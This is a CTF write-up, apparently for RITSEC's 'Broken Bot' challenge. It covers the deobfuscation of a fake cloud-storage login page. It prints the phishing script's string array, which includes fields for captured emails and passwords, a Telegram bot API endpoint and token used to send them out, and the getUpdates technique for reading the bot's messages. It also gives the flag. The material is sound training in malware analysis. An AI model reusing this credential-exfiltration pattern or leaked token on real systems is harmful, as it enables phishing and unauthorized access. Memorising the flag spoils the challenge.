## Brief **Broken Bot** is a web-based CTF challenge that tests your JavaScript deobfuscation and malware analysis skills. Your task is to investigate a compromised Cloud Storage Portal, decode obfuscated JavaScript code, and perform API queries to extract sensitive information. By detecting a misconfiguration, you can find the flag and demonstrate your cybersecurity expertise. **Expertise:** * Basic knowledge of JavaScript * Familiarity with JavaScript obfuscation techniques * Understanding of how malware can be concealed in JavaScript code * Ability to identify and analyze malicious code * Proficiency in using browser development tools for web debugging and analysis. **Acquired Knowledge:** * JavaScript deobfuscation * Malware analysis * API query and analysis * Misconfiguration detection ## Enumeration To start the challenge, we need to access the provided Cloud Storage Portal. This can be done by spawning the Docker container and accessing the IP address assigned to it. Upon accessing the IP, we will be directed to the login page for the Cloud Storage Portal. ![](https://vasic.dev/blog/wp-content/uploads/2023/04/RIT_1-1024x560.png) After accessing the login page for the Cloud Storage Portal, we need to view the JavaScript code running in the index.html page. However, before doing so, we may want to try logging in with a random password to see what happens. When attempting to log in with an incorrect password, I was redirected to another site, containing voicemail. This indicates that the login was not successful, but it also gives us a hint that something unexpected is happening in the background. With this in mind, we can proceed to view the JavaScript code running in the index.html page to identify any potential issues. ## Exploitation To view the JavaScript code running in the index.html page, open the browser's developer tools, go to the "Sources" tab, and locate the index.html file - or simply view source. ![](https://vasic.dev/blog/wp-content/uploads/2023/04/RIT_2-1024x530.png) To deobfuscate the JavaScript code in the index.html file, we can use a variety of techniques such as manual analysis or automated tools. Once the code is deobfuscated, we should be able to identify the API call being made. This API call may include information such as the URL, the method, and any headers or parameters being sent with the request. ``` var AC = ["val", "12ZidQyC", "20AFlrCY", "Email: ", "63792quNVYn", "substring", "append", "Region : ", "slice", "body", "139437pXYFEK", "#UserEmail", "toUpperCase", "click", "Useragent : ", "href", "88GpIPQU", "904cdojGd", "#submit", "#dname", '![](https://logo.clearbit.com/', )', "4716964xBODFJ", "3724320KAqSuZ", "5852841790", "Date Filled : ", "#inputPassword", "380874lxWkrT", "1170928pBbGzs", "https://api.telegram.org/bot", "head", "6055124896:AAFyQlC_8dr1GndB26ji4iV2ol2bPPQ9lq4"]; ``` Interesting. Once we have identified the API call being made in the JavaScript code, we can proceed to perform queries against the Telegram Bot's API using the provided key. ![](https://vasic.dev/blog/wp-content/uploads/2023/04/RIT_4.png) If the privacy settings of the Telegram Bot are disabled, all users can read messages via the getUpdates call. This means that any user can send an HTTP GET request to the appropriate API endpoint (likely `https://api.telegram.org/bot/getUpdates`) and receive a response containing all of the recent messages sent to the Telegram Bot. [More here.](https://core.telegram.org/bots/api#getupdates) ![](https://vasic.dev/blog/wp-content/uploads/2023/04/RIT_Flag-1024x840.png) By examining the code for the getUpdates API call, we can identify the flag **Flag{Always_Check_For_Misconfigurations}** that is likely to be sent as a message to the Telegram Bot. Original writeup (https://vasic.dev/blog/ritsec-ctf/#Broken_Bot).